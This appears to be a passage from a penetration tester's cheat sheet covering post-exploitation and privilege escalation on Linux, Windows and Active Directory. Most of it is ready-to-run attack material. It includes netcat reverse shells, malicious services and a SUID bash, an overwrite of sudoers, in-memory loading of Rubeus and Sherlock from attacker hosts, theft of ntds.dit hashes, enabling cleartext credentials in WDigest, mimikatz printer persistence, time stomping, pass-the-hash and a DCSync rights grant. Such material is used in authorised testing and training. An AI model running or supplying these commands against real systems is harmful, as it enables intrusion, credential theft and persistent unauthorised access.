https://github.com/RUB-NDS/PRET

$ ./pret.py
$ ./pret.py <printer fqdn> ps    // pjl

<RHOST>:/> ls
<RHOST>:/> cd
<RHOST>:/> get
<RHOST>:/> nvram dump

procdump

PS C:\> .\procdump64.exe -accepteula -ma <PID>
PS C:\> type <FILE>.dmp | Select-String "username="

pspy

https://github.com/DominicBreuker/pspy

$ pspy64 -f
$ pspy64 -pf -i 1000

pth-toolkit

https://github.com/byt3bl33d3r/pth-toolkit

$ pth-smbclient --user=<USERNAME> --pw-nt-hash -m smb3 \\\\<RHOST>\\<USERNAME> <HASH>

pwncat

https://github.com/calebstewart/pwncat

https://pwncat.readthedocs.io/en/latest/usage.html

Common Commands

(local) pwncat$ back    // get back to shell
Ctrl+d                  // get back to pwncat shell

$ pwncat-cs -lp <LPORT>
(local) pwncat$ download /PATH/TO/FILE/<FILE> .
(local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE>

Python

System Shell

$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Python Library Hijacking

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

https://medium.com/@klockw3rk/privilege-escalation-hijacking-python-library-2a0e92a45ca7

Get the current Path

$ python3 -c 'import sys;print(sys.path)'

remoteshell.py

import os
os.system("nc -lnvp <LPORT> -e /bin/bash")

Include Path

$ sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6

rpcclient

LDAP

$ rpcclient -U "" <RHOST>

Queries

srvinfo
netshareenum
netshareenumall
netsharegetinfo
netfileenum
netsessenum
netdiskenum
netconnenum
getanydcname
getdcname
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
dsr_getsitename
enumdomusers
enumdata
enumjobs
enumports
enumprivs
queryuser <USERNAME>

Rubeus

https://github.com/GhostPack/Rubeus

Overpass the Hash

PS C:\> Rubeus.exe kerberoast /user:<USERNAME>

Pass the Hash

PS C:\> .\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials

.NET Reflection

Example

$ base64 Rubeus.exe -w0 > <FILE>.txt

PS C:\> $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String((new-object net.webclient).downloadstring('http://<RHOST>/<FILE>.txt')))

PS C:\> [Rubeus.Program]::MainString("kerberoast /creduser:<DOMAIN>\<USERNAME> /credpassword:<PASSWORD>")

RunasCs

https://github.com/antonioCoco/RunasCs

C:\> ./RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>.exe'
C:\> ./RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT>

SeBackupPrivilege Privilege Escalation (diskshadow)

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Script for PowerShell Environment

SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias foobarp
createp
expose %foobar% z:p

PS C:\> diskshadow /s <FILE>.txt

Copy ntds.dit

PS C:\> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit

Export System Registry Value

PS C:\> reg save HKLM\SYSTEM c:\temp\system

Download ndts.dit and system and get the hashes from secretsdump.py of the impacket-suite.

setcap

$ setcap cap_setgid,cap_setuid+eip <FILE>

SharpHound

https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe

PS C:\> .\SharpHound.exe --CollectionMethod All

Shell Upgrade

$ python -c 'import pty;pty.spawn("/bin/bash")'

or

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ Ctrl + z
$ stty raw -echo
fg
Enter
Enter
$ export XTERM=xterm

Alternatively:

$ script -q /dev/null -c bash
$ /usr/bin/script -qc /bin/bash /dev/null

Oneliner

$ stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Fixing Staircase Effect

$ env reset

or

$ stty onlcr

Sherlock

https://github.com/rasta-mouse/Sherlock

Config

Add Find-AllVulns at the end of the script to run it as soon as it get's loaded.

            10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] }
            14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] }
            default { $VulnStatus = "Not Vulnerable" }

        }

    Set-ExploitTable $MSBulletin $VulnStatus

}
Find-AllVulns

$ IEX(New-Object Net.webclient).downloadString('http://<LHOST>/Sherlock.ps1')

systemctl

Malicious Service Privilege Escalation

Payload

[Unit]
Description=Example Service

[Service]
Type=simple
ExecStart=chmod +s /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target

Installation

$ echo '[Unit]
Description=Example Service

[Service]
Type=simple
ExecStart=chmod +s /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target' > /etc/systemd/system/<SERVICE>.service

Execution

$ sudo systemctl restart <SERVICE>

Time Stomping

$dateTime = New-Object System.DateTime(1999,12,26)
$regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SYSTEM\CurrentControlSet\Services\helpsvc",$true)[RegRoutines.NativeMethods]::SetRegistryKeyDateTime($regKey, $dateTime)

Universal Privilege Escalation and Persistence Printer

$printerName     = 'Pentest Lab Printer'
$system32        = $env:systemroot + '\system32'
$drivers         = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName

Copy-Item -Force -Path ($system32 + '\mscms.dll')             -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll'   -Destination ($drivers  + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers  + '\W32X86\3\mimispool.dll')

Add-PrinterDriver -Name       'Generic / Text Only'
Add-Printer       -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared

New-Item         -Path ($RegStartPrinter + '\CopyFiles')        | Out-Null

New-Item         -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Directory' -PropertyType 'String'      -Value 'x64\3'           | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null

New-Item         -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String'      -Value 'W32X86\3'        | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null

New-Item         -Path ($RegStartPrinter + '\CopyFiles\Mango')  | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Directory' -PropertyType 'String'      -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Files'     -PropertyType 'MultiString' -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Module'    -PropertyType 'String'      -Value 'mimispool.dll'   | Out-Null

User Group Exploitation

https://wixnic.github.io/linux-privesc-groups/

https://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/

Possibilities

- Edit /etc/passwd    // copy it to /tmp to edit
- Add new SSH Key to /root/

Find modifyable Files

$ find / -group root -perm -g=w ! -type l 2>/dev/null | grep -v 'proc\|sys' | xargs ls -l

Option 1

#!/usr/bin/env python
import os
import sys
try:
       os.system('cp /bin/sh /tmp/sh')
       os.system('chmod u+s /tmp/sh')
except:
       sys.exit()

Option 2

#!/usr/bin/env python
import os
import sys
try:
       os.system('echo "$USER ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
except:
       sys.exit()

VSS

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators

Abusing Server Operator Group Membership to get a Reverse Shell

$ sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe <LHOST> <LPORT>"
$ sc.exe stop vss
$ sc.exe start vss

WDigest

Store Cleartext Credentials Cleartext in LSASS

PS C:\> Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'"

Whisker

C:\> .\Whisker.exe add /target:<USERNAME>

Windows-Exploit-Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Prerequisites

$ python -m pip install xlrd

Update

$ ./windows-exploit-suggester.py --update

Usage

$ ./windows-exploit-suggester.py --database 2020-07-15-mssb.xls --systeminfo sysinfo

winexe

$ winexe -U '<USERNAME%PASSWORD>' //<RHOST> cmd.exe
$ winexe -U '<USERNAME%PASSWORD>' --system //<RHOST> cmd.exe

writeDACL

https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

Usage

PS C:\> $SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword)
PS C:\> Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync